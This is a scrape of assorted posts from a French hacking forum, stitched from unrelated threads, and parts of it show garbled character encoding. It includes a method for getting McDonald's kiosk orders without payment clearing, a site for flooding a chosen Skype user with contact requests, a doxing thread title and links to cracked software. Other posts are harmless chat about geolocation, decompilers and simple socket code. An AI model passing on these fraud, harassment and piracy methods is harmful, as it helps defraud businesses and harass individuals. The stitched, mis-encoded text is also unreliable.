Débanissement de gros serveur TeamSpeak<sep>Sinon bon tuto show_eval12457NoteEvaluateLessMore; 
Débanissement de gros serveur TeamSpeak<sep>  Eater wrote:  Hotspot shield = ca marche mais bourre a la pub... si tu te connectait pas au site porn avec tu verai tou de suite la différence crois moi______________________________  Je déteste les vendeur de programme....JEN AI PAS BESOIN.... HEIN SPEECH DUMPERhttps://scan.majyx.net/scans/image/140df3820b0b4d5b199b5d0b512935f08f5abeb5 show_eval12459NoteEvaluateLessMore; 
Débanissement de gros serveur TeamSpeak<sep>Je me suis jamais co au site porn mais bon pas sur mon pciphone show_eval12460NoteEvaluateLessMore; 
Débanissement de gros serveur TeamSpeak<sep>  Eater wrote:  Je me suis jamais co au site porn mais bon pas sur mon pciphone Lel______________________________  Ce soir ne dormez que dun oreille show_eval13586NoteEvaluateLessMore; 
Site Troll<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Site Troll<sep>  Seo wrote:  Bonjour Ceci nest pas lié au hack mais plutôt vers le spam. Aujourdhui je vais vous présenter un site.Il suffit dentrer le pseudo Skype dune personne exemple: Live:Lamer.lol. Mettre une tranche dâge et son genre Masculin et Féminin Suite à cela la personne recevra des tas de demandes damis et des appels.Ce qui forcera la personne à fuire de Skype Pour bien le spam il faudra laisser le site ouvert où alors remettre souvent son Skype en avant.Il peut rien ny avoir pendant 10 mins Mais après en recevoir 10 à la secondeVoici le site en question: https://www.addmecontacts.com/Voilà Voilà Joyeux Troll        Mdr je connais ce site xD      je voulais le publier aussi  show_eval16148NoteEvaluateLessMore; 
Site Troll<sep>mercii______________________________   show_eval17453NoteEvaluateLessMore; 
Manger au McDonald's gratuitement<sep>BijourDonc pour manger au McDonalds il vous faut : une carte self puce emv un macdo avec beaucoup de fréquentation un peu de chanceÉquiper vous de votre carte aller au borne un jour où il y a beaucoup de monde.Quand toute les bordes sont utilisés la vérification du payement ne se fait pas instantanément dès fois après plusieurs minutes terminaux sous XP chez moi en tout casFaite votre commande pas trop de chose comme mêmeAu moment de payer insérer votre carte pour moi une carte emv  type cb procéder au payement.Retirer votre commande et barrer vous.Voilà voilà testé et approuvé au McDonalds Rennais. show_eval11579NoteEvaluateLessMore; 
Manger au McDonald's gratuitement<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Manger au McDonald's gratuitement<sep>Merci pour linfo a testé   ______________________________  Hello everybody show_eval11610NoteEvaluateLessMore; 
Manger au McDonald's gratuitement<sep>Il se passe quoi si on se fait choper ? xD______________________________  Ne lance pas la flèche qui se retournera contre toi show_eval11636NoteEvaluateLessMore; 
Manger au McDonald's gratuitement<sep>A toi de voir jamais fait choppé au pire tu dit que tu as perdu le ticket x show_eval11637NoteEvaluateLessMore; 
[DOX] Kikoo Du 18-25 qui m'a menacé sur skype<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
[DOX] Kikoo Du 18-25 qui m'a menacé sur skype<sep>Comment a tu fais ?  ______________________________  printfVerrou par verrou et lun après lautre cest la clé du bon hacker. On ne peut pas ouvrir la porte numéro 9 avant davoir débloqué la numéro 8.; show_eval15169NoteEvaluateLessMore; 
Probleme Bitcoin core<sep>SalutCela fais prêt dun mois que je nai pas lancer Bitcoin core et je décide donc de la lancer pour tout rattraper les gens qui utilise ce logiciel comprendront mais quand je le lance Bitcoin core à cesse de fonctionner. Je me dit que ça doit être un problème de mon disque externe et le réinstalle donc sur mon disque principal mais même résultat.Comment je fais.  show_eval14609NoteEvaluateLessMore; 
Probleme Bitcoin core<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Probleme Bitcoin core<sep>tu est sur que cela vient pas du fais que tu installe les logiciels sur ton disque externe F et que tu les déplace sur le Principale? show_eval14610NoteEvaluateLessMore; 
Probleme Bitcoin core<sep>nn je nai rien déplacé. le plus souvent je reinstalle la logiciel en question comme SQLI Dumper et bitcoin core. et puis meme nn je lai juste lancé et ca ne marche pas alors que je ny avais plus touché. show_eval14611NoteEvaluateLessMore; 
Probleme Bitcoin core<sep>  minirisoto wrote:  nn je nai rien déplacé. le plus souvent je reinstalle la logiciel en question comme SQLI Dumper et bitcoin core. et puis meme nn je lai juste lancé et ca ne marche pas alors que je ny avais plus touché. Tu a un PC de marque je suppose? show_eval14613NoteEvaluateLessMore; 
Probleme Bitcoin core<sep>cest un Homen HP show_eval14614NoteEvaluateLessMore; 
Probleme Bitcoin core<sep>  minirisoto wrote:  cest un Homen HP Je vois ce que cest nouvelle gamme gaming de chez HP mais si cela fait sa pour tout les logiciels que tu installe tu est bon pour appeller le SAV.Dans cette situation la seul chose pour que jessaie de regarder le soucis il faidrait que je prenne le contrôle de ton pc...Métonnerais si tu est daccord show_eval14622NoteEvaluateLessMore; 
Probleme Bitcoin core<sep>euh... je ne prefere pas dsl. Mais cest bizard surtout quavant il marchait bien. Bref je verais ca show_eval14629NoteEvaluateLessMore; 
Présentation white<sep>Prénom: mark oui oui avec un kÂge: 17 ansPro: Autodidacte numérique web / audit de sécu / astreinteA propos:Je suis présent a beaucoup de conf donc hésitez pas on va sprendre un petit café a loccas x insomnihack ndh depuis 2010 defcon 23 et présent cette année je serais aussi à la MCIS 2016.Je vie entre mon appart et lhosto.Je suis iritable.Je suis dorigine  Biz______________________________  Je ne me considère pas comme le plus grand hacker mais avant de me dire quelque chose vérifiez vos sources. show_eval11182NoteEvaluateLessMore; 
Présentation white<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Présentation white<sep>Bianvénu  ______________________________  Dans la Vie il y a Deux choses qui sont infinies: LUnivers... Et la Bêtise de lHomme. show_eval11188NoteEvaluateLessMore; 
Présentation white<sep>Welcome ______________________________  Je fait partit de lassociation le langage C cest le meilleur si test pas daccord moi et mon ami le C on va bien te tabasser  Je rigole hein... show_eval11193NoteEvaluateLessMore; 
Présentation white<sep>tu es d autriche ? show_eval11217NoteEvaluateLessMore; 
Présentation white<sep>Hello Word  show_eval11218NoteEvaluateLessMore; 
Débats du soir<sep>pour ou contre un debats du soir vers 22h jusqua 23h a intervalles reguliere? show_eval11982NoteEvaluateLessMore; 
Débats du soir<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Débats du soir<sep>Pour si cest un débat argumenté sans bordel. Pas comme hier soir. show_eval11983NoteEvaluateLessMore; 
Débats du soir<sep>Ca sera plus cadre cest sur show_eval11984NoteEvaluateLessMore; 
Débats du soir<sep>Cest vrai quhier cest parti en couille______________________________  oui show_eval11989NoteEvaluateLessMore; 
Débats du soir<sep>Faudrait faire un chat à part avec possibilité de donner la parole tour à tour ça serait le best show_eval12000NoteEvaluateLessMore; 
Débats du soir<sep>pour show_eval12015NoteEvaluateLessMore; 
Débats du soir<sep>  Eater wrote:  pour ou contre un debats du soir vers 22h jusqua 23h a intervalles reguliere? pour show_eval12030NoteEvaluateLessMore; 
Débats du soir<sep>POUR______________________________  Nous sommes Anonymous. Nous sommes Légion. Nous ne pardonnons pas. Nous noublions pas. RedouteznousSachez que ce qui est sécurisé à 99 nest pas sécuriséLife is a hackPrice show_eval12032NoteEvaluateLessMore; 
Débats du soir<sep>POUR  lt;3 show_eval12498NoteEvaluateLessMore; 
Site DeepWeb .onion + tor browser<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Présentation Zitrox<sep>  Tivyous le créateur wrote:  très bonne présentation    merci dit moi ci il faut plus dinfo pour le presentation  show_eval16147NoteEvaluateLessMore; 
TUTO PYTHON ENVOYER DES MAIL<sep>Bonjour je vous montre en vidéo comment envoyé des mail en python :voici la vidéo : https://www.youtube.com/watch?v=OS5Ju2OUseofeature=youtu.beBonne appetit de connaissance ______________________________  Je fait partit de lassociation le langage C cest le meilleur si test pas daccord moi et mon ami le C on va bien te tabasser  Je rigole hein... show_eval1970NoteEvaluateLessMore; 
TUTO PYTHON ENVOYER DES MAIL<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
TUTO PYTHON ENVOYER DES MAIL<sep>Interressant si on veut spam  je pense à un tool placé sur un Vps qui pourrait nous permettre de spam des emails  Merci à toi  show_eval1988NoteEvaluateLessMore; 
TUTO PYTHON ENVOYER DES MAIL<sep>Speech Dumper ya plusieur façon denvoiller des mail la ces la versions la plus simplifier :______________________________  Je fait partit de lassociation le langage C cest le meilleur si test pas daccord moi et mon ami le C on va bien te tabasser  Je rigole hein... show_eval11006NoteEvaluateLessMore; 
TUTO PYTHON ENVOYER DES MAIL<sep>Je préfère use du php pour ça mais du python peut faire le taff je pense et ça peut être marrant ^^ show_eval11007NoteEvaluateLessMore; 
Craker Adobe After Effect Cs6<sep>Bonjour mes amis hackeurs voilà un petit lien pour télécharger after effect CS6 cest simplepremière étape cliquer sur ce lien pour télécharge le logiciel : http://www.mediafire.com/download/ctg...deuxième étape extrait le fichier sur votre bureau ou le fichier que vous voulezensuite pénétrez le fichier extrait et faire glisser le logiciel.exe sur votre bureauEnfin amusez vous a faire des montage    bon je sais pas mais moi jai besoin dargent pour acheter GMOD donc si vous voulez je me prostitue alors voici mon numéro 3630 3630.MERCI           ______________________________  ======Le Respect est une loi maître pour tous========    Je sais comment remercier mais amis mais je sais aussi  comment faire pour faire payer mes ennemis show_eval1789NoteEvaluateLessMore; 
Craker Adobe After Effect Cs6<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Craker Adobe After Effect Cs6<sep>  Lespartiate117 wrote:  Bonjour mes amis hackeurs voilà un petit lien pour télécharger after effect CS6 cest simplepremière étape cliquer sur ce lien pour télécharge le logiciel : http://www.mediafire.com/download/ctg...deuxième étape extrait le fichier sur votre bureau ou le fichier que vous voulezensuite pénétrez le fichier extrait et faire glisser le logiciel.exe sur votre bureauEnfin amusez vous a faire des montage     bon je sais pas mais moi jai besoin dargent pour acheter GMOD donc si vous voulez je me prostitue alors voici mon numéro 3630 3630.MERCI              1  merci .2 tien  un crack qui marche en multi et qui est autoupdate  télécharge le  show_eval1792NoteEvaluateLessMore; 
Craker Adobe After Effect Cs6<sep>ya pas de lien  ______________________________  ======Le Respect est une loi maître pour tous========    Je sais comment remercier mais amis mais je sais aussi  comment faire pour faire payer mes ennemis show_eval1794NoteEvaluateLessMore; 
Craker Adobe After Effect Cs6<sep>  CocoDu69100 wrote:  1  merci .2 tien  un crack qui marche en multi et qui est autoupdate  télécharge le    pourquoi tu dis sa ?______________________________  ======Le Respect est une loi maître pour tous========    Je sais comment remercier mais amis mais je sais aussi  comment faire pour faire payer mes ennemis show_eval1795NoteEvaluateLessMore; 
Craker Adobe After Effect Cs6<sep>  Lespartiate117 wrote:  ya pas de lien      http://www.mpcg.com/garrysmod/ show_eval1796NoteEvaluateLessMore; 
Venez apprendre le SQL Map<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Venez apprendre le SQL Map<sep>copie ton sujet sur un doc texte et tu le postera sur le nouveau fofo show_eval11739NoteEvaluateLessMore; 
Venez apprendre le SQL Map<sep>Le nouveau fofo sera pas privé?______________________________  Le danger est réel mais la peur est un choix show_eval11741NoteEvaluateLessMore; 
Venez apprendre le SQL Map<sep>copie ton sujet sur un doc texte et tu le postera sur le nouveau fofoya un new forum ?______________________________  Si tu veut me contactée pour des informationsAjoute moi sur Skypekali.linux37 Khme show_eval11747NoteEvaluateLessMore; 
Venez apprendre le SQL Map<sep>oui seulement reserve au hacker qui ont un potentielle new forum est en cours de dev show_eval11748NoteEvaluateLessMore; 
YOUTUBE TAGS VIEWER<sep>...Last edited by Shakatar on Tue 29 Aug  15:04 2017; edited 1 time in total show_eval15951NoteEvaluateLessMore; 
YOUTUBE TAGS VIEWER<sep>  Shakatar wrote:    Wizix Le Gameur wrote:  deja je ne vois pas pk tu a 2 scripte dans tes ressouce de ton application : les  2 premier Tu utilises quoi comme logiciel de décompilation ?   Parce que je nai aucune ajouter aucune ressource à mon logiciel.Cest surement lors de lobfuscation du logiciel que 2 ressources ont été ajoutées. jutilise ceci : [temps écoulé]Tien le mdp [temps écoulé] show_eval15952NoteEvaluateLessMore; 
YOUTUBE TAGS VIEWER<sep>  Wizix Le Gameur wrote:    Shakatar wrote:    Wizix Le Gameur wrote:  deja je ne vois pas pk tu a 2 scripte dans tes ressouce de ton application : les  2 premier Tu utilises quoi comme logiciel de décompilation ?   Parce que je nai aucune ajouter aucune ressource à mon logiciel.Cest surement lors de lobfuscation du logiciel que 2 ressources ont été ajoutées. jutilise ceci : [temps écoulé]Tien le mdp [temps écoulé] Cest quoi le nom ? show_eval15953NoteEvaluateLessMore; 
YOUTUBE TAGS VIEWER<sep>jutilise ceci :   [temps écoulé]Tien le mdp   [temps écoulé]Last edited by Zitrox on Tue 29 Aug  19:20 2017; edited 1 time in total show_eval15954NoteEvaluateLessMore; 
YOUTUBE TAGS VIEWER<sep>  Wizix Le Gameur wrote:  jutilise ceci :  https://lc.cx/c63WTien le mdp  http://www.sendspace.com/file/em0ml1 Moi jutilise ILSpy et il ny a pas les 2 ressources. show_eval15955NoteEvaluateLessMore; 
YOUTUBE TAGS VIEWER<sep>  Wizix Le Gameur wrote:  jutilise ceci :   [temps écoulé]Tien le mdp   [temps écoulé] Tu fais chié avec ton timer xDD______________________________  Happy horrible christmas38° 53 52 N 77° 02 12 O Kill The Childrens ec4e07263910e1b2cf71cd6fe759a82d  show_eval15960NoteEvaluateLessMore; 
YOUTUBE TAGS VIEWER<sep>  Traja06 wrote:    Wizix Le Gameur wrote:  jutilise ceci :   [temps écoulé]Tien le mdp   [temps écoulé] Tu fais chié avec ton timer xDD jai regarder et ILSpy est beaucoup mieu que le mien   http://ilspy.net/ show_eval15961NoteEvaluateLessMore; 
Comment géolocaliser une personne avec une ip ?<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Comment géolocaliser une personne avec une ip ?<sep>https://www.maxmind.com/fr/geoipdemo tu peut géo ip avec. show_eval11603NoteEvaluateLessMore; 
Comment géolocaliser une personne avec une ip ?<sep>Sa marche vraiment ?______________________________  Simple mais très utile :p show_eval11609NoteEvaluateLessMore; 
Comment géolocaliser une personne avec une ip ?<sep>Oui après cest une formule gratuite donc ça donne un peu près faut payer pour qur ca soit plus précis show_eval11613NoteEvaluateLessMore; 
Comment géolocaliser une personne avec une ip ?<sep>oui effectivement______________________________  Hello everybody show_eval11614NoteEvaluateLessMore; 
Comment géolocaliser une personne avec une ip ?<sep>Ce nest pas precis  les serveurs vont juste comparer le ping entre les different serveurs et trouver a peu pres la geolpcalisation .  Seul avec lautorisation du fai que tu pourra avoir ladresse de la box  show_eval11647NoteEvaluateLessMore; 
[GEO-IP] Logiciel<sep>Bonjour/Bonsoirje me suis fait chier du cout jai crée un petit logiciel de Geolocalisation En esperant que cela vous servira au moin une fois xTout ce qui diront que il y a un virus aller sur virus total BORDEL https://virustotal.com/fr/file/b4a20f9f7522fae470957aa9edc3d398968995a58bebbabf0686a6fa49696a17/analysis/1499275907/Lien de téléchargement : https://www.mediafire.com/?vje4apudrb18yyj______________________________  Bientot nouveau Forum :O show_eval15706NoteEvaluateLessMore; 
[GEO-IP] Logiciel<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
[GEO-IP] Logiciel<sep>BonjourAutant passer par le site http://freegeoip.net/xml/ si tu vois ce que je veut dire...Mais quand même GG à toi pour le Javascript ça a du prendre du temps et de la patience.Et tu nétais pas obligé de créer un Sub GeoIp vu que tu lutilises quune seule fois donc tu aurais pu directement mettre le code du Sub dans Button1.Click et supprimé ton Sub.Et à quoi sert ton Timer ?Check aussi avec un If ou un Try si le text de la textbox est bien un ensemble de chiffres et de points une ip en grosPour la prochaine fois pense à obfuscé je sais pas vraiment si ca ce dit vu quà la base cest un mot anglais le code je ne veux pas voler ton logiciel juste voir comment tu lavais fais cest toujours intéressant dapprendre.GG ca me sera surement utile  show_eval15714NoteEvaluateLessMore; 
[GEO-IP] Logiciel<sep>Je me suis rater sur mon timer jai pas fait tres gaffe x sinon je prend note de ce que tu dis  cela maidera______________________________  Bientot nouveau Forum :O show_eval15716NoteEvaluateLessMore; 
[GEO-IP] Logiciel<sep>Super  Mais tu pourrais etre plus précis sur le lat/long ?______________________________  printfVerrou par verrou et lun après lautre cest la clé du bon hacker. On ne peut pas ouvrir la porte numéro 9 avant davoir débloqué la numéro 8.; show_eval15730NoteEvaluateLessMore; 
[GEO-IP] Logiciel<sep>Cest difficile détablir une adresse précise avec une adresse IP tu pourras au moins avoir la ville et le quartier cest déjà ça.   show_eval15734NoteEvaluateLessMore; 
[GEO-IP] Logiciel<sep>Javoue merci______________________________  printfVerrou par verrou et lun après lautre cest la clé du bon hacker. On ne peut pas ouvrir la porte numéro 9 avant davoir débloqué la numéro 8.; show_eval15742NoteEvaluateLessMore; 
Crack<sep>Hey salut a tous jaimerai cracker des programme moi même donc si quelquun a un petit tuto cest la bien venu ______________________________  Je suis Youtuber  Va tabonner  BigZey  show_eval13881NoteEvaluateLessMore; 
Crack<sep>PublicitéSupprimer les publicités ?document.write<iframe scrolling=no src=/pub.php?f=728x90oa=1p=728x90_lastmessci=63aA=1crtg_content=empty style=border: 0; width: 728px; height: 90px; frameborder=0 allowTransparency=true></iframe>;
Crack<sep>cracker dans le sens lavoir gratuit ? show_eval13882NoteEvaluateLessMore; 
Lors de ma prÃ©sentation jai fait allusion Ã  NetBus que javais utilisÃ© au moment de sa gloire peu enviable selon certains.  Vos rÃ©ponses ont Ã  peu prÃ¨s toutes fait allusion Ã  votre haine envers ce programme au but peu recommandable.  Bon Cest super Ã§a Je viens de dÃ©poser mes valises et je dois expliquer mon passÃ©.    Jai bien soulignÃ© que javais utilisÃ© ce programme alors quil venait de sortir et que javais 10 ans Ã  lÃ©poque. Souvenezvous comment vous Ã©tiez Ã  dix ans; facilement impressionable. Et moi je nÃ©chappe pas Ã  la rÃ¨gle. Moi un petit garÃ§on de 10 ans je peux entrer illÃ©galement dans les ordinateurs des gens et faire ce que je veux...un pur fantasme pour un gamin qui venait de dÃ©couvrire linternet.  Bien sur depuis la chute de ce Trojan je nai plus touchÃ© Ã  ce genre de truc ou du moins pas dans pas pour les mÃªmes intÃ©rÃªt. En parcourant le forum jai bien vu que javais Ã  faire Ã  des hacker au code dhonneur...honorable. Tant mieux Cest mon cas. Donc ne me jugez pas sur mon passÃ© oÃ¹ je nai quun episode peu reluisant.  Mais eh vous lÃ   Si vous le connaissez ce programme cest que vous lavez sans doute utiliser? Ah non Je ne porterai pas letiquette du criminel repenti. Je ne suis quun enfant qui a grandit...nuance.
ben un deassembleur genre olly ou windasm. Mais fait des tutos si ta jamais crackÃ©  
Localisation: BÃ©thoncourt 25200         Bonjour un film que jaime bien et dont le scÃ©nario est tout Ã  fait plausible cest Wargames 
CensurÃ© : encore un rappel  passer par la section prÃ©sentation  est une marque de politesse envers les autres membres avant de poster la premiÃ¨re rÃ©ponse. Merci.   NETTOYEUR25 le : 30  11  2008  Ã  23 H 30 .
Ã vous lire sans vouloir dre Ã§a mÃ©chament il nexiste pas vraiment de film du genre qui ne soit dÃ©jÃ  fait...    Pourquoi pas plutÃ´t lhistoire dun gars A qui rencontre par hasard un autre Bgenre il lui sauve la vie lors dun accident de voiture; B veut alors revoir A pour faire un peu plus connaissance peu Ã  peu alors que des liens se nouent entre les deux comparses B initie A Ã  linformatique et au Haking...  Fin de la premiÃ¨re partie car maintenant cest bien beau tout Ã§a mais il faut un mÃ©chant ben oui sinon il ny a pas de rÃ©elle histoire. Donc on reprend un classique: Alors que B et A sont en train de gentiment pirater un site pour apprendre pas par intÃ©ret ils se font tracer beh oui Ã§a arrive par un mÃ©chant appelÃ© C. Mais C il est malin et il dÃ©cide de profiter des talents de nos deux comparses  il les recontacts Ã  la limite en piratant leurs pc  et fait du chantage avec eux le coup classique quoi: sils ne font pas ce quil leurs demande il livre les preuves de leurs intrusion Ã  la police.  En gros ils doivent pirater une banque faire tous les plans rÃ©cupÃ©rer les donnÃ©es dans les poubelles tient Ã§a me rappelle quelque chose... => film Hacker   etc. La premiÃ¨re fois pas de problÃ¨mes tranquille. Ils recommencent deuxtrois fois jusquÃ  ce quil y ait un gars D qui leur posent un piÃ¨ge. Ensuite les flics remontent jusquÃ  A et B; descente de police etc.  Et lÃ  faut trouver un joli dÃ©nouement parce que je suis un peu pressÃ© et quaprÃ¨s tout cest ton job pas le miens...  
Localisation: ::1:         Jai fait un petit tour sur le plus gros site de vpc informatique belge hÃ© oui Ã©tant belge... et voila le rÃ©sultat... surprenant... :   ASRock ConRoe1333D667 Intel 945GC Express  Micro ATX  carte graphique intÃ©grÃ©  42.36â?¬  Intel Celeron D 331 2.66 GHz Socket 775 FSB533 0.09 micron EMT64 version boÃ®te  garantie Intel 3 ans  38.34â?¬  Hitachi Deskstar 7K160  160 Go 7200 RPM 8 Mo Serial ATA II bulk  40.46 â?¬  ASUSTeK TS6A1  Noir  touralim 250W intÃ©grÃ©  52.56â?¬  Crucial 1 Go DDR
Je vous laccorde ce topic na pas grand chose a voir avec le hack. Mais il me semble important de rester conscient des progrÃ¨s dans lÃ©volution de limitation de lhomme par la machine. Qui sais peut Ãªtre un jours certain filme serons rÃ©elle...   Par Jean Etienne FuturaSciences     Citation:    Un ordinateur est parvenu Ã  analyser lactivitÃ© cÃ©rÃ©brale avec suffisamment de prÃ©cision pour dÃ©terminer la forme gÃ©omÃ©trique en loccurrence une lettre que regardait le sujet.   Ces expÃ©riences ont Ã©tÃ© conduites par un spÃ©cialiste du domaine Yukiyasu Kamitani responsable des laboratoires informatiques de neurologie dATR Advanced Telecommunications Research Institute International Ã  Kyoto et Frank Tong de lâuniversitÃ© de Princeton. Leurs surprenants rÃ©sultats viennent dÃªtre publiÃ©s dans la revue Neuron.   Dans un premier temps des volontaires regardaient diverses reprÃ©sentations composÃ©es de lignes obliques alignÃ©es sous diffÃ©rentes orientations tandis que lâactivitÃ© de leur cortex visuel Ã©tait analysÃ©e par IRM.   Les scientifiques ont dâabord notÃ© les caractÃ©ristiques de ce flux pour chacune des images. Ils ont ensuite crÃ©er un logiciel devant choisir lun de ces modÃ¨les selon lâactivitÃ© cÃ©rÃ©brale dÃ©tectÃ©e. Et effectivement ce programme a pu dÃ©terminer ce que les volontaires observaient... De plus si deux images diffÃ©rentes Ã©taient projetÃ©es simultanÃ©ment devant les sujets Ã  qui on demandait de se concentrer sur lune delles il Ã©tait aussi possible de dÃ©terminer laquelle recevait toute leur attention.   Dans une deuxiÃ¨me sÃ©rie dâexpÃ©riences deux images Ã©taient projetÃ©es mais lâune dâentre elles clignotait tellement rapidement que les sujets ne pouvaient matÃ©riellement pas lâidentifier ni mÃªme la percevoir consciemment. Pourtant en analysant lâactivitÃ© de leur cerveau les chercheurs ont pu dÃ©terminer de quelle image il sâagissait alors mÃªme que les volontaires nâen avaient aucun souvenir.   Visualiser les pensÃ©es    Enfin et câest lÃ  lâaspect le plus spectaculaire de lâexpÃ©rience les scientifiques ont rÃ©ussi Ã  sâaffranchir de la sÃ©rie de modÃ¨les prÃ©Ã©tablis utilisÃ©s lors des premiers essais.   Pour cela ils ont projetÃ© devant les sujets les six lettres N E U R O N dans un ordre alÃ©atoire et ont analysÃ© le signal directement issu du nerf optique transmis dans le cortex visuel. Lâinformation a ensuite Ã©tÃ© dÃ©codÃ©e par ordinateur qui avait reÃ§u au prÃ©alable les types de signaux produits en rÃ©ponse Ã  une stimulation sur les mÃªmes sujets suite Ã  la perception dâune suite de 400 images diffÃ©rentes.   Le rÃ©sultat est Ã©tonnant. Lâordinateur a rÃ©ussi Ã  reconstituer lâimage de la lettre de lâalphabet telle quâelle a Ã©tÃ© perÃ§ue sur la rÃ©tine de chaque volontaire et Ã  la reprÃ©senter sur Ã©cran. Le procÃ©dÃ© est bien sÃ»r limitÃ© et exige de dresser prÃ©alablement un tableau de correspondances entre formes et signaux pour chaque individu.   Mais cette technique ne se rÃ©clame dâaucune rupture technologique et met en Åuvre des moyens scientifiques connus et Ã©prouvÃ©s ouvrant ainsi la voie Ã  une expÃ©rimentation que de nombreux centres de recherche poursuivront certainement...     source: http://www.futurasciences.com/fr/news/t/technologie1/d/lordinateurpourraitilliredanslespensees_17673/
Bien le bonjour Fireburn.   Cest clair que cest hallucinant ce que lon peut faire en analysant lactivitÃ© cÃ©rÃ©brale. Mais lire dans les pensÃ©es nest pas encore pour demain. En gros on fait regarder au sujet du rouge on enregistre les signaux qui correspondent Ã  la vue du rouge et quand ils se reproduisent on dit ah lÃ  il voit du rouge.   Pour les raisonnements et par exemple les sentiments on en est encore trÃ¨s loin. De plus les signaux ne sont pas forcÃ©ment les mÃªmes pour deux personnes diffÃ©rentes en prÃ©sence du mÃªme stimulus.
Bonjour je suis noiveau sur ce site et je ne comprend pas comment on fait pour reussir les challenge il faut un logiciel ??? merci de me repondre au plus vite Ã 
Et bien pour rÃ©ussir un challenge :   On lis attentivement sa description  Tu regardes ce qui tes demandÃ©  Tu trouve la faille et tu lexploites  On consulte la partie Aide au challenge du forum quand on bloque  On poste dans la bonne partie du forum  On dÃ©crit ou on bloque ce que lon a dÃ©ja fait et dans quel challenge  On fait un petite prÃ©sentation dans la partie prÃ©sentation   Sur ce...   Si quelquun veux bien lockÃ© et dÃ©placÃ© le sujet dans la bonne partie du forum.  le mettre en annonce pour donner lexemple ?  Jai un soucis avec mes droits de modÃ©ration je vais voir avec kori ce qui se passe
salut je suis etudiant en BTS Mecanque et autmatisme industriel et kome je commence un peu l programmaion votre site minterrese fortment donc voila ...merci a tous
... Derien ...   Bienvenue
Yop et bienvenue.
Salut a toi 
Bienvenue a toi
Hello merci beaucoup 
yep en plus on se fait ban si on test Ã§a sur un serveur sÃ©curisÃ© ^^ essayer Ã§a en passant par proxy  
hehe dsl mais cest quoi ce charabia?
Lexploit il faut le rajouter derriÃ¨re lURL ?
Cest un script perl.  Il faut donc le mettre dans un fichier .pl puis linterprÃ©ter avec votre programme perl.
Active perl est trÃ¨s bien si vous voulez cela ^^ AprÃ¨s il est possible que votre fenÃªtre dos se ferme trÃ¨s vite aprÃ¨s lexÃ©cution du programme sans en avoir les rÃ©sultats. Alors lancer cmd.exe puis exÃ©cuter votre programme depuis lÃ   
bon jimagine que lexploit prÃ©sentÃ© cidessus est dÃ©passÃ© mais cest pas grave pour me familiariser avec la chose jai choppÃ© active perl et tentÃ© cet exploit.  Jai donc crÃ©e un fichier .pl activeperl le reconnait super...  quand je le lance saffiche une invit je rentre ladresse dun forum... et lÃ  je ne sais pas quoi faire.  Avezvous un tuto Ã  ce sujet?   merci
Ok merci mais cest bon jai trouver.  Mais corriges moi si je me trompe :     Code:      import socket   ip =  www.hackbbs.org  port = 80  socket = socket.socketsocket.AF_INETsocket.SOCK_STREAM  requete = get HTTP /1.0\ Host: www.hackbbs.org Connection : Close  socket.sendrequete  reponse = socket.recv1024  print reponse      Cest bien Ã§a non ?
Lis la rfc bordel si tu lavais fais tu aurais vu que tu as encore fais une erreur. Si tecoutes ps les conseils quon te donne alors pourquoi tu postes ici?  En plus Ã§a mÃ©tonnerai quavec 1024 en recv tu ais toute la page mais bon ...
THEDEATH     celle lÃ  marche :     Code:       envoi = GET / HTTP/1.0\r\n\r\n;  envoi .= Host: www.siteduzero.com\r\n;  envoi .= Connection: Close\r\n\r\n;  reception = ;      Maintenant entrainement python =DÃ§a mais sur une ligne x
